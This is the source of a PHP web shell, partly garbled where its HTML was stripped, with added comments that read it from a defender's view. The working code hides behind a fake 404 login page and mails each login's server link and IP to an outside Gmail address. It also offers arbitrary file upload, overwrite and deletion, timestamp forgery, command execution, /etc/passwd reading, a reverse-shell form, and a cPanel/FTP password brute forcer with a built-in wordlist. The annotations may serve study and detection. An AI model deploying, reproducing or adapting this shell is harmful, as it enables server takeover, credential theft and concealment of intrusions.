$_value) { if ($_key{0} != '_') { if (IS_GPC) { $_value = s_array($_value); } $$_key = $_value; } } } /*================= Info Login ================*/ $admin = array(); $admin['check'] = true; $admin['pass'] = 'niemdamme'; // Password login $admin['cookiepre'] = ''; $admin['cookiedomain'] = ''; $admin['cookiepath'] = '/'; $admin['cookielife'] = 86400; /*===================== End =====================*/ if ($charset == 'utf8') { header("content-Type: text/html; charset=utf-8"); } elseif ($charset == 'big5') { header("content-Type: text/html; charset=big5"); } elseif ($charset == 'gbk') { header("content-Type: text/html; charset=gbk"); } elseif ($charset == 'latin1') { header("content-Type: text/html; charset=iso-8859-2"); } $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; $timestamp = time(); /*===================== Login =====================*/ if ($action == "logout") { scookie('vbapass', '', -86400 * 365); p(''); p('
'); exit; } if ($admin['check']) { if ($doing == 'login') { if ($admin['pass'] == $password) { scookie('vbapass', $password); $time_shell = "" . date("d/m/Y - H:i:s") . ""; $ip_remote = $_SERVER["REMOTE_ADDR"]; $from_shellcode = 'shell@' . gethostbyname($_SERVER['SERVER_NAME']) . ''; $to_email = 'dimitriuskan@gmail.com'; $server_mail = "" . gethostbyname($_SERVER['SERVER_NAME']) . " - " . $_SERVER['HTTP_HOST'] . ""; $linkcr = "Link: " . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . " - IP Excuting: $ip_remote - Time: $time_shell"; $header = "From: $from_shellcode\r\nReply-to: $from_shellcode"; @mail($to_email, $server_mail, $linkcr, $header); p(''); p('
Loading
|
|
||
[Server IP: " . gethostbyname($_SERVER['SERVER_NAME']) . ""; ?> - Your IP: " . $_SERVER['REMOTE_ADDR'] . ""; ?>] File Manager | MySQL Manager | MySQL Upload & Download | Execute Command | PHP Variable | Eval PHP Code | Brute | /etc/passwd | Back Connect |
'goaction'));
makehide('action');
formfoot();
// Working-directory setup for the file manager view.
// None of the bare variables used here ($errmsg, $dir) is assigned in this span. The
// import loop at the top of the file (`$$_key = $_value`) appears to copy request
// parameters into global variables, so they should be read as request-controlled
// — TODO confirm against the cut-off loop header.
$errmsg && m($errmsg);
// Fall back to the current directory when the request names none.
!$dir && $dir = '.';
// getPath() is defined outside this span; presumably it resolves $dir against SA_ROOT — verify.
$nowpath = getPath(SA_ROOT, $dir);
// Normalise $dir so it always ends in a slash.
if (substr($dir, -1) != '/') {
$dir = $dir . '/';
}
// ue() is defined outside this span; presumably URL-encodes the path for use in links — verify.
$uedir = ue($dir);
if (!$action || $action == 'file') {
// File-manager action dispatcher.
// At most one branch runs per request, chosen by which request-derived variables are
// set ($doing, $newdirname, $doupfile, ...). No branch in this span restricts the path
// to a base directory or validates file names, and most filesystem calls are prefixed
// with `@`, so failures leave no PHP warning in the error log.
// Incident-response reading: every branch is a write, delete, permission/timestamp
// change or bulk read performed as the web-server account. On a host where this ran,
// mtimes and permissions of files reachable by that account are not trustworthy
// evidence; prefer ctime, filesystem journals, backups and web access logs.
$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
if ($doing == 'deldir' && $thefile) {
// Directory removal. deltree() is defined outside this span; presumably recursive — verify.
if (!file_exists($thefile)) {
m($thefile . ' directory does not exist');
} else {
m('Directory delete ' . (deltree($thefile) ? basename($thefile) . ' success' : 'failed'));
}
} elseif ($newdirname) {
// Create a directory under the current path with mode 0755.
$mkdirs = $nowpath . $newdirname;
if (file_exists($mkdirs)) {
m('Directory has already existed');
} else {
m('Directory created ' . (@mkdir($mkdirs, 0755) ? 'success' : 'failed'));
@chmod($mkdirs, 0755);
}
} elseif ($doupfile) {
// Upload: the temp file is copied to $uploaddir under the client-supplied file name.
// No extension, type or path check is applied, and copy() is used rather than
// move_uploaded_file(), so PHP's "is this really an upload" check is not enforced.
m('File upload ' . (@copy($_FILES['uploadfile']['tmp_name'], $uploaddir . '/' . $_FILES['uploadfile']['name']) ? 'success' : 'failed'));
} elseif ($editfilename && $filecontent) {
// Overwrite an arbitrary file with request-supplied content (mode 'w' truncates first).
$fp = @fopen($editfilename, 'w');
m('Save file ' . (@fwrite($fp, $filecontent) ? 'success' : 'failed'));
@fclose($fp);
} elseif ($pfile && $newperm) {
// chmod: $newperm arrives as an octal string and is converted to its decimal value.
if (!file_exists($pfile)) {
m('The original file does not exist');
} else {
$newperm = base_convert($newperm, 8, 10);
m('Modify file attributes ' . (@chmod($pfile, $newperm) ? 'success' : 'failed'));
}
} elseif ($oldname && $newfilename) {
// Rename/move $oldname to a new name inside the current directory.
$nname = $nowpath . $newfilename;
if (file_exists($nname) || !file_exists($oldname)) {
m($nname . ' has already existed or original file does not exist');
} else {
m(basename($oldname) . ' renamed ' . basename($nname) . (@rename($oldname, $nname) ? ' success' : 'failed'));
}
} elseif ($sname && $tofile) {
// Copy $sname to $tofile; refuses to overwrite an existing destination.
if (file_exists($tofile) || !file_exists($sname)) {
m('The goal file has already existed or original file does not exist');
} else {
m(basename($tofile) . ' copied ' . (@copy($sname, $tofile) ? basename($tofile) . ' success' : 'failed'));
}
} elseif ($curfile && $tarfile) {
// Timestamp cloning: the mtime of $tarfile is applied to $curfile as both mtime and
// atime. This is timestomping (MITRE ATT&CK T1070.006); a dropped file can be made to
// match its neighbours, so "recently modified" sweeps alone will miss it.
if (!@file_exists($curfile) || !@file_exists($tarfile)) {
m('The goal file has already existed or original file does not exist');
} else {
$time = @filemtime($tarfile);
m('Modify file the last modified ' . (@touch($curfile, $time, $time) ? 'success' : 'failed'));
}
} elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
// Timestamp set from explicit date parts; same forensic caveat as the branch above.
if (!@file_exists($curfile)) {
m(basename($curfile) . ' does not exist');
} else {
$time = strtotime("$year-$month-$day $hour:$minute:$second");
m('Modify file the last modified ' . (@touch($curfile, $time, $time) ? 'success' : 'failed'));
}
} elseif ($doing == 'downrar') {
// Bulk download: the keys of $dl are taken as file paths, packed by PHPZip (defined
// outside this span) and streamed as an attachment. The attachment name is built from
// the request's Host header plus the literal 'sql.gz', which can serve as a proxy or
// egress-log indicator for this family of script.
if ($dl) {
$dfiles = '';
foreach ($dl as $filepath => $value) {
$dfiles.= $filepath . ',';
}
$dfiles = substr($dfiles, 0, strlen($dfiles) - 1);
$dl = explode(',', $dfiles);
$zip = new PHPZip($dl);
$code = $zip->out;
header('Content-type: application/octet-stream');
header('Accept-Ranges: bytes');
header('Accept-Length: ' . strlen($code));
header('Content-Disposition: attachment;filename=' . $_SERVER['HTTP_HOST'] . 'sql.gz');
echo $code;
exit;
} else {
m('Please select file(s)');
}
} elseif ($doing == 'delfiles') {
// Bulk delete: unlink() on every key of $dl, counting successes and failures.
if ($dl) {
$dfiles = '';
$succ = $fail = 0;
foreach ($dl as $filepath => $value) {
if (@unlink($filepath)) {
$succ++;
} else {
$fail++;
}
}
m('Deleted file have finished??choose ' . count($dl) . ' success ' . $succ . ' fail ' . $fail);
} else {
m('Please select file(s)');
}
}
// Hidden helper forms, one per file operation. Each carries empty hidden fields whose
// names match the variables tested by the action dispatcher earlier in this branch
// (newdirname; newperm + pfile; sname + tofile; oldname + newfilename), plus the
// current directory. Presumably client-side script fills and submits them; that
// script is not visible in this copy of the file.
// The form and field names emitted here (createdir, fileperm, copyfile, rename,
// fileopform) appear verbatim in the rendered page and in POST bodies, which makes
// them usable as content-inspection or log-search strings.
formhead(array('name' => 'createdir'));
makehide('newdirname');
makehide('dir', $nowpath);
formfoot();
formhead(array('name' => 'fileperm'));
makehide('newperm');
makehide('pfile');
makehide('dir', $nowpath);
formfoot();
formhead(array('name' => 'copyfile'));
makehide('sname');
makehide('tofile');
makehide('dir', $nowpath);
formfoot();
formhead(array('name' => 'rename'));
makehide('oldname');
makehide('newfilename');
makehide('dir', $nowpath);
formfoot();
// Generic per-file form: carries the next $action, the selected file and the directory.
formhead(array('name' => 'fileopform'));
makehide('action');
makehide('opfile');
makehide('dir');
formfoot();
// Disk usage banner for the volume that holds $nowpath. Errors from the disk_* calls
// are suppressed and a false/empty result is replaced by 0.
$free = @disk_free_space($nowpath);
!$free && $free = 0;
$all = @disk_total_space($nowpath);
!$all && $all = 0;
// $used is computed but does not appear in the output line below.
$used = $all - $free;
// NOTE(review): 100 / ($all / $free) is free space as a percentage of total, despite
// the variable name; when $free is 0 the inner division has a zero divisor.
$used_percent = @round(100 / ($all / $free), 2);
// sizecount() is defined outside this span; presumably formats a byte count — verify.
p('File Manager Current disk free ' . sizecount($free) . ' of ' . sizecount($all) . ' (' . $used_percent . '%)');
?>
| ||||||
');
p(' | ||||||
Filename | Last modified | Size | Chmod / Perms | Action | ||
0 | '); p('' . $dirdb['filename'] . ' | '); p('' . $dirdb['mtime'] . ' | '); p('-- | '); p(''); p('' . $dirdb['dirchmod'] . ' / '); p('' . $dirdb['dirperm'] . '' . $dirdb['fileowner'] . ' | '); p('Del | Rename | '); p('|
= | Parent Directory | '); p('|||||
'); p('DBHost:'); makeinput(array('name' => 'dbhost', 'size' => 20, 'value' => $dbhost)); p(':'); makeinput(array('name' => 'dbport', 'size' => 4, 'value' => $dbport)); p('DBUser:'); makeinput(array('name' => 'dbuser', 'size' => 15, 'value' => $dbuser)); p('DBPass:'); makeinput(array('name' => 'dbpass', 'size' => 15, 'value' => $dbpass)); p('DBName:'); makeinput(array('name' => 'dbname', 'size' => 15, 'value' => $dbname)); p('DBCharset:'); makeselect(array('name' => 'charset', 'option' => $charsets, 'selected' => $charset)); p('
'); formfoot(); p(''); } elseif ($action == 'sqladmin') { !$dbhost && $dbhost = 'localhost'; !$dbuser && $dbuser = 'root'; !$dbport && $dbport = '3306'; $dbform = ''; if (isset($dbhost)) { $dbform.= "\n"; } if (isset($dbuser)) { $dbform.= "\n"; } if (isset($dbpass)) { $dbform.= "\n"; } if (isset($dbport)) { $dbform.= "\n"; } if (isset($dbname)) { $dbform.= "\n"; } if (isset($charset)) { $dbform.= "\n"; } if ($doing == 'backupmysql' && $saveasfile) { if (!$table) { m('Please choose the table'); } else { dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); $table = array_flip($table); $fp = @fopen($path, 'w'); if ($fp) { $result = q('SHOW tables'); if (!$result) p(''); p('DBHost:'); makeinput(array('name' => 'dbhost', 'size' => 20, 'value' => $dbhost)); p(':'); makeinput(array('name' => 'dbport', 'size' => 4, 'value' => $dbport)); p('DBUser:'); makeinput(array('name' => 'dbuser', 'size' => 15, 'value' => $dbuser)); p('DBPass:'); makeinput(array('name' => 'dbpass', 'size' => 15, 'value' => $dbpass)); p('DBCharset:'); makeselect(array('name' => 'charset', 'option' => $charsets, 'selected' => $charset)); makeinput(array('name' => 'connect', 'value' => 'Connect', 'type' => 'submit', 'class' => 'bt')); p('
'); formfoot(); ?> 'recordlist')); makehide('doing'); makehide('action', 'sqladmin'); makehide('base64'); makehide('tablename'); p($dbform); formfoot(); formhead(array('name' => 'setdbname')); makehide('action', 'sqladmin'); p($dbform); if (!$dbname) { makehide('dbname'); } formfoot(); formhead(array('name' => 'settable')); makehide('action', 'sqladmin'); p($dbform); makehide('tablename'); makehide('page', $page); makehide('doing'); formfoot(); $cachetables = array(); $pagenum = 30; $page = intval($page); if ($page) { $start_limit = ($page - 1) * $pagenum; } else { $start_limit = 0; $page = 1; } if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) { dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); $mysqlver = mysql_get_server_info(); p('MySQL ' . $mysqlver . ' running in ' . $dbhost . ' as ' . $dbuser . '@' . $dbhost . '
'); $highver = $mysqlver > '4.1' ? 1 : 0; $query = q("SHOW DATABASES"); $dbs = array(); $dbs[] = '-- Select a database --'; while ($db = mysql_fetch_array($query)) { $dbs[$db['Database']] = $db['Database']; } makeselect(array('title' => 'Please select a database:', 'name' => 'db[]', 'option' => $dbs, 'selected' => $dbname, 'onchange' => 'moddbname(this.options[this.selectedIndex].value)', 'newline' => 1)); $tabledb = array(); if ($dbname) { p(''); p('Current dababase: ' . $dbname . ''); if ($tablename) { p(' | Current Table: ' . $tablename . ' [ Insert | Structure | Drop ]'); } p('
'); mysql_select_db($dbname); $getnumsql = ''; $runquery = 0; if ($sql_query) { $runquery = 1; } $allowedit = 0; if ($tablename && !$sql_query) { $sql_query = "SELECT * FROM $tablename"; $getnumsql = $sql_query; $sql_query = $sql_query . " LIMIT $start_limit, $pagenum"; $allowedit = 1; } p(''); if ($tablename || ($runquery && $sql_query)) { if ($doing == 'structure') { $result = q("SHOW COLUMNS FROM $tablename"); $rowdb = array(); while ($row = mysql_fetch_array($result)) { $rowdb[] = $row; } p('Field | '); p('Type | '); p('Null | '); p('Key | '); p('Default | '); p('Extra | '); p('
' . $row['Field'] . ' | '); p('' . $row['Type'] . ' | '); p('' . $row['Null'] . ' | '); p('' . $row['Key'] . ' | '); p('' . $row['Default'] . ' | '); p('' . $row['Extra'] . ' | '); p('
Action | '); $fieldnum = @mysql_num_fields($result); for ($i = 0;$i < $fieldnum;$i++) { $name = @mysql_field_name($result, $i); $type = @mysql_field_type($result, $i); $len = @mysql_field_len($result, $i); p("$name $type($len) | ");
}
p('
' . html_clean($inside) . ' | '; } $where = base64_encode($where); if ($allowedit) p('Edit | Del | '); p($b1); p('
'); p('Your IP:'); makeinput(array('name' => 'yourip', 'size' => 20, 'value' => $yourip)); p('Your Port:'); makeinput(array('name' => 'yourport', 'size' => 15, 'value' => $yourport)); p('Use:'); makeselect(array('name' => 'use', 'option' => $usedb, 'selected' => $use)); makeinput(array('name' => 'start', 'value' => 'Start', 'type' => 'submit', 'class' => 'bt')); p('
'); formfoot(); } elseif ($action == 'brute') { formhead(array('title' => 'Brute Forcer')); makehide('action', 'brute'); makehide('dir', $brute); @ini_set('memory_limit', 1000000000000); $connect_timeout = 5; @set_time_limit(0); $submit = $_REQUEST['submit']; $users = $_REQUEST['users']; $pass = $_REQUEST['passwords']; $target = $_REQUEST['target']; $option = $_REQUEST['option']; $passlist = "123pass 123!@# 123admin 123abc 123456admin 1234554321 12344321 pass123 admin admincp administrator matkhau passadmin p@ssword password 012345 123456 1234567 12345678 123456789 1234567890 111111 000000 222222 333333 444444 555555 666666 777777 888888 999999 123123 234234 345345 456456 567567 678678 789789 123321 456654 654321 7654321 87654321 987654321 0987654321 admin123 admin123456 abcdef abcabc !@#!@# !@#$%^ !@#$%^&*( !@#$$#@! abc123 anhyeuem iloveyou admin administrator admincp cpanel adminx admins password passwords passw0rd p@ssw0rd p@ssword khongco 25251325 passw0rds"; if ($target == '') { $target = 'localhost'; } print "";
?>
Error : Connection timed out , make confidence about validation of target !";
exit;
} elseif (curl_errno($ch) == 0) {
p("[ Leorius@live.com ]#
Attacking has been done! Username: $user / Password: $pass => Login
");
}
curl_close($ch);
}
// Tests one username/password pair against the service on TCP port 2082 of $host
// using HTTP Basic authentication over plain HTTP.
//
// $host    - target host name or address, interpolated into the URL unvalidated.
// $user    - user name to try.
// $pass    - password to try.
// $timeout - connect timeout in seconds (CURLOPT_CONNECTTIMEOUT).
//
// Returns nothing. Prints a message and terminates the whole script on a timeout;
// prints the credential pair when the request completes without a curl error.
//
// Defender notes: on the targeted service this appears as a run of Basic-auth requests
// to :2082 from a single web host; on the hosting side as outbound connections to
// port 2082 made by the PHP worker. Lockout or rate limiting on the target and egress
// filtering for web-server processes both apply.
function cpanel_check($host, $user, $pass, $timeout) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
// With FAILONERROR set, an HTTP status of 400 or above (including 401) is reported as
// a curl error, so errno 0 below means the server did not reject the credentials.
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
// The response body is captured but never inspected; only the curl error code is used.
$data = curl_exec($ch);
// curl error 28 is the timeout code; the script exits here without closing the handle.
if (curl_errno($ch) == 28) {
print " Error : Connection timed out , make confidence about validation of target !";
exit;
} elseif (curl_errno($ch) == 0) {
// The accepted pair is echoed into the response page in clear text, so it can also
// end up in any proxy or response-body capture between the server and the operator.
p("[ Leorius@live.com ]# Attacking has been done! Username: $user / Password: $pass
");
}
curl_close($ch);
}
// Credential-guessing driver: runs only when the form's submit field is present.
// $users, $pass, $target and $option are read from $_REQUEST earlier in this branch,
// so every value here is request-controlled.
if (isset($submit) && !empty($submit)) {
// One candidate per line in each submitted list.
$userlist = explode("\n", $users);
// Overwrites the hard-coded $passlist string assigned earlier in this branch with the
// submitted list; how that default reaches the form is not visible in this copy.
$passlist = explode("\n", $pass);
p('[ Leorius@live.com ]# Attacking ...
');
// Full cross product: every user is tried with every password, one connection per
// pair and no delay between attempts. The resulting traffic is a dense sequence of
// failed logins from one source, which lockout thresholds and fail2ban-style rate
// limits on the target service are designed to catch.
foreach ($userlist as $user) {
$_user = trim($user);
foreach ($passlist as $password) {
$_pass = trim($password);
// ftp_check()'s header is cut off in this copy of the file; only its tail is visible.
if ($option == "ftp") {
ftp_check($target, $_user, $_pass, $connect_timeout);
}
if ($option == "cpanel") {
cpanel_check($target, $_user, $_pass, $connect_timeout);
}
}
}
}
formfoot();
} elseif ($action == 'etcpwd') {
formhead(array('title' => 'Get /etc/passwd'));
makehide('action', 'etcpwd');
makehide('dir', $nowpath);
$i = 0;
echo "
Instead »'); p('year:'); makeinput(array('name' => 'year', 'value' => date('Y', $opfilemtime), 'size' => 4)); p('month:'); makeinput(array('name' => 'month', 'value' => date('m', $opfilemtime), 'size' => 2)); p('day:'); makeinput(array('name' => 'day', 'value' => date('d', $opfilemtime), 'size' => 2)); p('hour:'); makeinput(array('name' => 'hour', 'value' => date('H', $opfilemtime), 'size' => 2)); p('minute:'); makeinput(array('name' => 'minute', 'value' => date('i', $opfilemtime), 'size' => 2)); p('second:'); makeinput(array('name' => 'second', 'value' => date('s', $opfilemtime), 'size' => 2)); p('
'); formfooter(); } elseif ($action == 'shell') { if (IS_WIN && IS_COM) { if ($program && $parameter) { $shell = new COM('Shell.Application'); $a = $shell->ShellExecute($program, $parameter); m('Program run has ' . (!$a ? 'success' : 'fail')); } !$program && $program = 'c:\windows\system32\cmd.exe'; !$parameter && $parameter = '/c net start > ' . SA_ROOT . 'log.txt'; formhead(array('title' => 'Execute Program')); makehide('action', 'shell'); makeinput(array('title' => 'Program', 'name' => 'program', 'value' => $program, 'newline' => 1)); p(''); makeinput(array('title' => 'Parameter', 'name' => 'parameter', 'value' => $parameter)); makeinput(array('name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute')); p('
'); formfoot(); } formhead(array('title' => 'Execute Command')); makehide('action', 'shell'); if (IS_WIN && IS_COM) { $execfuncdb = array('phpfunc' => 'phpfunc', 'wscript' => 'wscript', 'proc_open' => 'proc_open'); makeselect(array('title' => 'Use:', 'name' => 'execfunc', 'option' => $execfuncdb, 'selected' => $execfunc, 'newline' => 1)); } p(''); makeinput(array('title' => 'Command', 'name' => 'command', 'value' => $command)); makeinput(array('name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute')); p('
'); formfoot(); if ($command) { p(''); if ($execfunc == 'wscript' && IS_WIN && IS_COM) { $wsh = new COM('WScript.shell'); $exec = $wsh->exec('cmd.exe /c ' . $command); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; } elseif ($execfunc == 'proc_open' && IS_WIN && IS_COM) { $descriptorspec = array(0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w')); $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes); if (is_resource($process)) { fwrite($pipes[0], $command . "\r\n"); fwrite($pipes[0], "exit\r\n"); fclose($pipes[0]); while (!feof($pipes[1])) { echo fgets($pipes[1], 1024); } fclose($pipes[1]); while (!feof($pipes[2])) { echo fgets($pipes[2], 1024); } fclose($pipes[2]); proc_close($process); } } else { echo (execute($command)); } p(''); } } elseif ($action == 'phpenv') { $upsize = getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed'; $adminmail = isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from'); !$dis_func && $dis_func = 'No'; $info = array(1 => array('Server Time', date('Y/m/d h:i:s', $timestamp)), 2 => array('Server Domain', $_SERVER['SERVER_NAME']), 3 => array('Server IP', gethostbyname($_SERVER['SERVER_NAME'])), 4 => array('Server OS', PHP_OS), 5 => array('Server OS Charset', $_SERVER['HTTP_ACCEPT_LANGUAGE']), 6 => array('Server Software', $_SERVER['SERVER_SOFTWARE']), 7 => array('Server Web Port', $_SERVER['SERVER_PORT']), 8 => array('PHP run mode', strtoupper(php_sapi_name())), 9 => array('The file path', __FILE__), 10 => array('PHP Version', PHP_VERSION), 11 => array('PHPINFO', (IS_PHPINFO ? 
'Yes' : 'No')), 12 => array('Safe Mode', getcfg('safe_mode')), 13 => array('Administrator', $adminmail), 14 => array('allow_url_fopen', getcfg('allow_url_fopen')), 15 => array('enable_dl', getcfg('enable_dl')), 16 => array('display_errors', getcfg('display_errors')), 17 => array('register_globals', getcfg('register_globals')), 18 => array('magic_quotes_gpc', getcfg('magic_quotes_gpc')), 19 => array('memory_limit', getcfg('memory_limit')), 20 => array('post_max_size', getcfg('post_max_size')), 21 => array('upload_max_filesize', $upsize), 22 => array('max_execution_time', getcfg('max_execution_time') . ' second(s)'), 23 => array('disable_functions', $dis_func),); if ($phpvarname) { m($phpvarname . ' : ' . getcfg($phpvarname)); } formhead(array('title' => 'Server environment')); makehide('action', 'phpenv'); makeinput(array('title' => 'Please input PHP configuration parameter(eg:magic_quotes_gpc)', 'name' => 'phpvarname', 'value' => $phpvarname, 'newline' => 1)); formfooter(); $hp = array(0 => 'Server', 1 => 'PHP'); for ($a = 0;$a < 2;$a++) { p('
Pages: ' . $multipage . '
' : ''; } return $multipage; } function loginpage() { ?>The requested URL / was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
$arg[title]
"); } else { p("$arg[title]"); } } function makeselect($arg = array()) { if ($arg['onchange']) { $onchange = 'onchange="' . $arg['onchange'] . '"'; } $arg['title'] = $arg['title'] ? $arg['title'] : ''; if ($arg['newline']) p(''); p("$arg[title] "); if ($arg['newline']) p('
'); } function formhead($arg = array()) { !$arg['method'] && $arg['method'] = 'post'; !$arg['action'] && $arg['action'] = $self; $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : ''; !$arg['name'] && $arg['name'] = 'form1'; p("'); } function formfoot() { p(''); } function pr($a) { echo ''; print_r($a); echo ''; }